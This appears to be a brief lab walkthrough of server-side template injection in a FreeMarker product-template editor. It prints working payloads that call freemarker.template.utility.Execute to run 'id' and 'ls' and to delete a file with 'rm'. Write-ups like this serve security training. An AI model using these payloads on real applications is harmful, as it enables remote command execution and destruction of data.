First, we need to “View details” of a product and click “Edit template”. We can see that the template get data by using ${product.name}.
Changing it to ${a} and click “Preview” raised an exception with the name of the template which is FreeMarker template.
According to @albinowax in Server-Side Template Injection, to execute ‘id‘ command, we inject:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
Then, we execute ‘ls‘ and there is a file named 'morale.txt‘.
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("ls") }Remove the file with:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm morale.txt") }
ethan 